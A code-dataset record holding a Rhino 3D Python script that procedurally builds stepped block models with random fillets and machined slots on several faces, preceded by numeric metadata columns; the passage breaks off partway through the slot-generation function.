| 350
| 186
| 53.037143
| 0.761988
| 0.044659
| 0
| 0.897887
| 0
| 0
| 0.083314
| 0.002837
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028169
| false
| 0
| 0.028169
| 0
| 0.056338
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62977ec9e8e6bc7ad876840aae510ac2f62bd01e
| 46,796
|
py
|
Python
|
GeneratorScripts/CADGeneratorModel4.py
|
ankitpatnala/RhinoScriptsForSlots
|
bde3974799b74fda9da7fd928a6b6848db99a94f
|
[
"MIT"
] | null | null | null |
GeneratorScripts/CADGeneratorModel4.py
|
ankitpatnala/RhinoScriptsForSlots
|
bde3974799b74fda9da7fd928a6b6848db99a94f
|
[
"MIT"
] | null | null | null |
GeneratorScripts/CADGeneratorModel4.py
|
ankitpatnala/RhinoScriptsForSlots
|
bde3974799b74fda9da7fd928a6b6848db99a94f
|
[
"MIT"
] | null | null | null |
import Rhino
import scriptcontext
import rhinoscriptsyntax as rs
import System.Guid
import random
import json
import sys
import os
import math
def SquareDistanceBetweenTwoPoints(point1, point2):
    """Return the squared Euclidean distance between two 3-D points.

    Accepts any objects exposing ``X``/``Y``/``Z`` attributes (e.g.
    ``Rhino.Geometry.Point3d``).  The squared distance avoids the square
    root and is sufficient for distance comparisons.
    """
    # Compute component deltas directly rather than allocating a throwaway
    # Rhino.Geometry.Point3d just to hold them.
    dx = point2.X - point1.X
    dy = point2.Y - point1.Y
    dz = point2.Z - point1.Z
    return dx * dx + dy * dy + dz * dz
def AddBrepBox(point1, point2):
    """Return a Brep box spanning the axis-aligned bounding box of two corner points.

    Removed the dead local ``rc = Rhino.Commands.Result.Failure`` — it was
    never read or returned.
    """
    box = Rhino.Geometry.BoundingBox(point1, point2)
    return box.ToBrep()
def AddCylinder(centerPoint, orientation, radius, height):
    """Return a capped cylinder Brep.

    The cylinder's axis starts at ``centerPoint`` and follows the
    ``orientation`` vector; its base circle has the given ``radius`` and
    the solid extends ``height`` along the axis.  Both ends are capped
    (``ToBrep(True, True)``).
    """
    base_plane = Rhino.Geometry.Plane(centerPoint, orientation)
    base_circle = Rhino.Geometry.Circle(base_plane, radius)
    solid = Rhino.Geometry.Cylinder(base_circle, height)
    return solid.ToBrep(True, True)
def GenerateSlotsForSteppedModel():
point1 = Rhino.Geometry.Point3d(10 + random.random()*5,
10 + random.random()*5,
10 + random.random()*5)
point2 = Rhino.Geometry.Point3d(point1.X + 10 + random.random()*5,
point1.Y,
point1.Z + 10 + random.random())
brepBox1 = AddBrepBox(Rhino.Geometry.Point3d(0,0,0),point1)
brepBox2 = AddBrepBox(Rhino.Geometry.Point3d(point1.X,0,0),
Rhino.Geometry.Point3d(point2))
brepArray = [brepBox1,brepBox2]
tolerance = scriptcontext.doc.ModelAbsoluteTolerance
orientationIdx = random.randint(0,5)
straight = bool(random.randint(0,1))
leftMargin = 3
filled = False
height = 2 + random.random()*2
randomEdge = random.randint(0,3)
filletRadius = 2+ 2*random.random()
if(randomEdge == 0):
filletBrepBox = AddBrepBox(Rhino.Geometry.Point3d(0,0,0),Rhino.Geometry.Point3d(filletRadius,filletRadius,point1.Z))
filletCylinder = AddCylinder(Rhino.Geometry.Point3d(filletRadius,filletRadius,0),Rhino.Geometry.Vector3d(0,0,1),filletRadius,point1.Z)
brepFillet = Rhino.Geometry.Brep.CreateBooleanDifference(filletBrepBox,filletCylinder,tolerance)[0]
elif(randomEdge == 1):
filletBrepBox = AddBrepBox(Rhino.Geometry.Point3d(point2.X - filletRadius,0,0),Rhino.Geometry.Point3d(point2.X,filletRadius,point2.Z))
filletCylinder = AddCylinder(Rhino.Geometry.Point3d(point2.X - filletRadius,filletRadius,0),Rhino.Geometry.Vector3d(0,0,1),filletRadius,point2.Z)
brepFillet = Rhino.Geometry.Brep.CreateBooleanDifference(filletBrepBox,filletCylinder,tolerance)[0]
elif(randomEdge == 2):
filletBrepBox = AddBrepBox(Rhino.Geometry.Point3d(point2.X - filletRadius,point2.Y - filletRadius ,0),Rhino.Geometry.Point3d(point2.X,point2.Y,point2.Z))
filletCylinder = AddCylinder(Rhino.Geometry.Point3d(point2.X - filletRadius,point2.Y - filletRadius ,0),Rhino.Geometry.Vector3d(0,0,1),filletRadius,point2.Z)
brepFillet = Rhino.Geometry.Brep.CreateBooleanDifference(filletBrepBox,filletCylinder,tolerance)[0]
else:
filletBrepBox = AddBrepBox(Rhino.Geometry.Point3d(0,point1.Y - filletRadius ,0),Rhino.Geometry.Point3d(filletRadius,point1.Y,point1.Z))
filletCylinder = AddCylinder(Rhino.Geometry.Point3d(filletRadius,point1.Y - filletRadius ,0),Rhino.Geometry.Vector3d(0,0,1),filletRadius,point1.Z)
brepFillet = Rhino.Geometry.Brep.CreateBooleanDifference(filletBrepBox,filletCylinder,tolerance)[0]
if(orientationIdx == 0):
lowerBlock = bool(random.randint(0,1))
if(straight):
xAxis = bool(random.randint(0,1))
if(lowerBlock):
leftPointX = leftMargin + random.random()*(point1.X-leftMargin)
leftPointY = leftMargin + random.random()*(point1.Y- leftMargin)
if(xAxis):
rightPointX = leftPointX + random.random()*(point1.X-leftPointX-3)
rightPointY = leftPointY
width = 2.5 + random.random()*(min(leftPointY,point2.Y-leftPointY)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX,leftPointY-width/2,point1.Z-height)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX, rightPointY + width/2,point1.Z)
else:
rightPointX = leftPointX
rightPointY = leftPointY + random.random()*(point1.Y - leftPointY)
width = 2.5 + random.random()*(min(leftPointX,point2.X-leftPointX)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX-width/2,leftPointY,point1.Z-height)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX + width/2,rightPointY,point1.Z)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
else:
leftPointX = point1.X + leftMargin + random.random()*(point2.X - point1.X - leftMargin)
leftPointY = leftMargin + random.random()*(point2.Y- leftMargin)
if(xAxis):
rightPointX = leftPointX + random.random()*(point2.X-leftPointX-3)
rightPointY = leftPointY
width = 2.5 + random.random()*(min(leftPointY,point2.Y-leftPointY)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX,leftPointY-width/2,point2.Z-height)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX, rightPointY + width/2,point2.Z)
else:
rightPointX = leftPointX
rightPointY = leftPointY + random.random()*(point2.Y - leftPointY-3)
width = 2.5 + random.random()*(min(leftPointX,point2.X-leftPointX)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX-width/2,leftPointY,point2.Z-height)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX + width/2,rightPointY,point2.Z)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,leftPointY,0),
Rhino.Geometry.Point3d(rightPointX,rightPointY,0))
else:
if(lowerBlock):
leftPointX = leftMargin + random.random()*(point1.X-leftMargin)
leftPointY = leftMargin + random.random()*(point1.Y-leftMargin)
rightPointX = leftPointX + random.random()*(point1.X - leftPointX-3)
rightPointY = leftPointY + random.random()*(point1.Y - leftPointY-3)
width = 2.5 + random.random()*(min(leftPointY,point1.Y-rightPointY)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,leftPointY,0),
Rhino.Geometry.Point3d(rightPointX,rightPointY,0))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(-1*(rightPointX-leftPointX),(rightPointY-leftPointY),0)
points = [Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2, leftPointY - perpendicularVector.Y*width/2,point1.Z - height),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2, leftPointY + perpendicularVector.Y*width/2,point1.Z - height),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2, rightPointY + perpendicularVector.Y*width/2,point1.Z - height),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2, rightPointY - perpendicularVector.Y*width/2,point1.Z - height),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2, rightPointY - perpendicularVector.Y*width/2,point1.Z),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2, rightPointY + perpendicularVector.Y*width/2,point1.Z),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2, leftPointY + perpendicularVector.Y*width/2,point1.Z),
Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2, leftPointY - perpendicularVector.Y*width/2,point1.Z)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
leftPointX = leftMargin + point1.X + random.random()*(point2.X - leftMargin - point1.X)
leftPointY = leftMargin + random.random()*(point2.Y - leftMargin)
rightPointX = leftPointX + random.random()*(point2.X - leftPointX-3)
rightPointY = leftPointY + random.random()*(point2.Y - leftPointY -3)
width = 2.5 + random.random()*(min(leftPointY, point1.Y - leftPointY)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,leftPointY,0),
Rhino.Geometry.Point3d(rightPointX,rightPointY,0))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(-1*(rightPointX-leftPointX),(rightPointY-leftPointY),0)
points = [Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2, leftPointY - perpendicularVector.Y*width/2,point2.Z - height),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2, leftPointY + perpendicularVector.Y*width/2,point2.Z - height),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2, rightPointY + perpendicularVector.Y*width/2,point2.Z - height),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2, rightPointY - perpendicularVector.Y*width/2,point2.Z - height),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2, rightPointY - perpendicularVector.Y*width/2,point2.Z),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2, rightPointY + perpendicularVector.Y*width/2,point2.Z),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2, leftPointY + perpendicularVector.Y*width/2,point2.Z),
Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2, leftPointY - perpendicularVector.Y*width/2,point2.Z)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox2,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
elif (orientationIdx == 1):
leftPointX = leftMargin + random.random()*(point2.X-leftMargin)
leftPointY = leftMargin + random.random()*(point2.Y-leftMargin)
if(straight):
xAxis = bool(random.randint(0,1))
if(xAxis):
rightPointX = leftPointX + random.random()*(point2.X - leftPointX-3)
rightPointY = leftPointY
width = 2.5 + random.random()*(min(leftPointY,point2.Y - leftPointY)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX,leftPointY - width/2,0)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX,rightPointY + width/2,height)
else:
rightPointX = leftPointX
rightPointY = leftPointY + random.random()*(point2.Y - leftPointY -3)
width = 2.5 + random.random()*(min(leftPointX,point2.X - leftPointX)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX - width/2,leftPointY,0)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX + width/2,rightPointY, height)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,leftPointY,0),
Rhino.Geometry.Point3d(rightPointX,rightPointY,0))
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepTotalVolume = brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
rightPointX = leftPointX + random.random()*(point2.X-leftPointX)
rightPointY = leftPointY + random.random()*(point2.Y -leftPointY)
width = 2.5 + random.random()*(min(leftPointY,
point2.Y -leftPointY,
rightPointY,
point2.Y -rightPointY)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,leftPointY,0),
Rhino.Geometry.Point3d(rightPointX,rightPointY,0))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(-1*(rightPointX-leftPointX),(rightPointY-leftPointY),0)
points = [Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2, leftPointY - perpendicularVector.Y*width/2,height),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2, leftPointY + perpendicularVector.Y*width/2,height),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2, rightPointY + perpendicularVector.Y*width/2,height),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2, rightPointY - perpendicularVector.Y*width/2,height),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2, rightPointY - perpendicularVector.Y*width/2,0),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2, rightPointY + perpendicularVector.Y*width/2,0),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2, leftPointY + perpendicularVector.Y*width/2,0),
Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2, leftPointY - perpendicularVector.Y*width/2,0)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArray,tolerance)
brepTotalVolume = Rhino.Geometry.Brep.CreateBooleanUnion([brepUnion[0],brepToSubtract],tolerance)[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
if(brepTotalVolume == brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume and brepUnion is not None):
brepTotalVolume = brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
elif(orientationIdx == 2):
lowerBlock = bool(random.randint(0,1))
if(straight):
yAxis = bool(random.randint(0,1))
if(lowerBlock):
leftPointY = leftMargin + random.random()*(point1.Y - leftMargin)
leftPointZ = leftMargin + random.random()*(point1.Z - leftMargin)
if(yAxis):
rightPointY = leftPointY + random.random()*(point1.Y-leftPointY-3)
rightPointZ = leftPointZ
width = 2.5 + random.random()*(min(leftPointZ- point1.Z,point2.Z-rightPointZ)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(point1.X,leftPointY,leftPointZ-width/2)
upperDiagonal = Rhino.Geometry.Point3d(point1.X + height, rightPointY, rightPointZ + width/2)
else:
rightPointY = leftPointY
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ)
width = 2.5 + random.random()*(min(leftPointY,point1.Y-leftPointY)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(point1.X,leftPointY - width/2,leftPointZ)
upperDiagonal = Rhino.Geometry.Point3d(point1.X + height,rightPointY + width/2,rightPointZ)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
else:
leftPointY = leftMargin + random.random()*(point1.Y -leftMargin)
leftPointZ = leftMargin + point1.Z + random.random()*(point2.Z -point1.Z - leftMargin)
if(yAxis):
rightPointY = leftPointY + random.random()*(point2.Y-leftPointY-3)
rightPointZ = leftPointZ
width = 2.5 + random.random()*(min(leftPointZ - point1.Z ,point2.Z - rightPointZ )-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(point1.X,leftPointY,leftPointZ-width/2)
upperDiagonal = Rhino.Geometry.Point3d(point1.X + height, rightPointY ,rightPointZ + width/2)
else:
rightPointY = leftPointY
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ-3)
width = 2.5 + random.random()*(min(leftPointY,point2.Y-leftPointY)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(0,leftPointY - width/2,leftPointZ)
upperDiagonal = Rhino.Geometry.Point3d(height,rightPointY + width/2,rightPointZ)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(0,leftPointY,leftPointZ),
Rhino.Geometry.Point3d(0,rightPointY,rightPointZ))
else:
if(lowerBlock):
leftPointY = leftMargin + random.random()*(point1.Y-leftMargin)
leftPointZ = leftMargin + random.random()*(point1.Z-leftMargin)
rightPointY = leftPointY + random.random()*(point1.Y - leftPointY - 3)
rightPointZ = leftPointZ + random.random()*(point1.Z - leftPointZ - 3)
width = 2.5 + random.random()*(min(leftPointY,point1.Y-rightPointY)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(0,leftPointY,leftPointZ),
Rhino.Geometry.Point3d(0,rightPointY,rightPointZ))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(0,-1*(rightPointZ-leftPointZ),(rightPointY-leftPointY))
points = [Rhino.Geometry.Point3d(0, leftPointY - perpendicularVector.Y*width/2,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(0, leftPointY + perpendicularVector.Y*width/2,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(0, rightPointY + perpendicularVector.Y*width/2,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(0, rightPointY - perpendicularVector.Y*width/2,rightPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(height, leftPointY - perpendicularVector.Y*width/2,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(height, leftPointY + perpendicularVector.Y*width/2,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(height, rightPointY + perpendicularVector.Y*width/2,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(height, rightPointY - perpendicularVector.Y*width/2,rightPointZ - perpendicularVector.Z*width/2)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
leftPointY = leftMargin + random.random()*(point1.Y - leftMargin)
leftPointZ = leftMargin + point1.Z + random.random()*(point2.Z - leftMargin - point1.Z)
rightPointY = leftPointY + random.random()*(point2.Y - leftPointY -3)
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ -3)
width = 2.5 + random.random()*(min(leftPointY, point1.Y - leftPointY)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(0,leftPointY,leftPointZ),
Rhino.Geometry.Point3d(0,rightPointY,rightPointZ))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(0,-1*(rightPointZ-leftPointZ),(rightPointY-leftPointY))
points = [Rhino.Geometry.Point3d(point1.X, leftPointY - perpendicularVector.Y*width/2,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point1.X, leftPointY + perpendicularVector.Y*width/2,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point1.X, rightPointY + perpendicularVector.Y*width/2,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point1.X, rightPointY - perpendicularVector.Y*width/2,rightPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point1.X + height, leftPointY - perpendicularVector.Y*width/2,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point1.X + height, leftPointY + perpendicularVector.Y*width/2,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point1.X + height, rightPointY + perpendicularVector.Y*width/2,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point1.X + height, rightPointY - perpendicularVector.Y*width/2,rightPointZ - perpendicularVector.Z*width/2)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox2,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
elif (orientationIdx == 3):
leftPointY = leftMargin + random.random()*(point2.Y-leftMargin)
leftPointZ = leftMargin + random.random()*(point2.Z-leftMargin)
if(straight):
yAxis = bool(random.randint(0,1))
if(yAxis):
rightPointY = leftPointY + random.random()*(point2.Y - leftPointY-3)
rightPointZ = leftPointZ
width = 2.5 + random.random()*(min(leftPointZ,point2.Z - leftPointZ)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(point2.X -height,leftPointY,leftPointZ - width/2)
upperDiagonal = Rhino.Geometry.Point3d(point2.X,rightPointY ,rightPointZ + width/2)
else:
rightPointY = leftPointY
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ -3)
width = 2.5 + random.random()*(min(leftPointY,point2.Y - leftPointY)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(point2.X - height,leftPointY - width/2,leftPointZ)
upperDiagonal = Rhino.Geometry.Point3d(point2.X,rightPointY + width/2, rightPointZ)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(0,leftPointY,leftPointZ),
Rhino.Geometry.Point3d(0,rightPointY,rightPointZ))
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepTotalVolume = brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
rightPointY = leftPointY + random.random()*(point2.Y -leftPointY - 3)
rightPointZ = leftPointZ + random.random()*(point2.Z -leftPointZ - 3)
width = 2.5 + random.random()*(min(leftPointY,
point2.Y -leftPointY,
leftPointZ,
point2.Z -rightPointZ)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(0,leftPointY,leftPointZ),
Rhino.Geometry.Point3d(0,rightPointY,rightPointZ))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(0,-1*(rightPointZ-leftPointZ),(rightPointY-leftPointY))
points = [Rhino.Geometry.Point3d(point2.X - height, leftPointY - perpendicularVector.Y*width/2,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point2.X - height, leftPointY + perpendicularVector.Y*width/2,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point2.X - height, rightPointY + perpendicularVector.Y*width/2,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point2.X - height, rightPointY - perpendicularVector.Y*width/2,rightPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point2.X, leftPointY - perpendicularVector.Y*width/2,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point2.X, leftPointY + perpendicularVector.Y*width/2,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point2.X, rightPointY + perpendicularVector.Y*width/2,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point2.X, rightPointY - perpendicularVector.Y*width/2,rightPointZ - perpendicularVector.Z*width/2)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArray,tolerance)
brepTotalVolume = Rhino.Geometry.Brep.CreateBooleanUnion([brepUnion[0],brepToSubtract],tolerance)[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
if(brepTotalVolume == brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume):
brepTotalVolume = brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
elif(orientationIdx == 4):
lowerBlock = True#bool(random.randint(0,1))
if(straight):
xAxis = bool(random.randint(0,1))
if(lowerBlock):
leftPointX = leftMargin + random.random()*(point2.X - leftMargin)
leftPointZ = leftMargin + random.random()*(point1.Z - leftMargin)
if(xAxis):
rightPointX = leftPointX + random.random()*(point2.X-leftPointX-3)
rightPointZ = leftPointZ
width = 2.5 + random.random()*(min(leftPointZ,point1.Z-rightPointZ)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX,0,leftPointZ-width/2)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX,height,rightPointZ + width/2)
else:
rightPointX = leftPointX
rightPointZ = leftPointZ + random.random()*(point1.Z - leftPointZ - 3)
width = 2.5 + random.random()*(min(leftPointX,point2.X-leftPointX)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX - width/2,0,leftPointZ)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX + width/2,height,rightPointZ)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
else:
leftPointX = leftMargin + point1.X + random.random()*(point2.X - point1.X -leftMargin)
leftPointZ = leftMargin + random.random()*(point2.Z - leftMargin)
if(xAxis):
rightPointX = leftPointX + random.random()*(point2.X-leftPointX-3)
rightPointZ = leftPointZ
width = 2.5 + random.random()*(min(leftPointZ, point2.Z - rightPointZ )-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX,0,leftPointZ-width/2)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX , height, rightPointZ + width/2)
else:
rightPointX = leftPointX
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ-3)
width = 2.5 + random.random()*(min(leftPointX-point1.X,point2.X-rightPointX)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX - width/2,0,leftPointZ)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX + width/2,height,rightPointZ)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
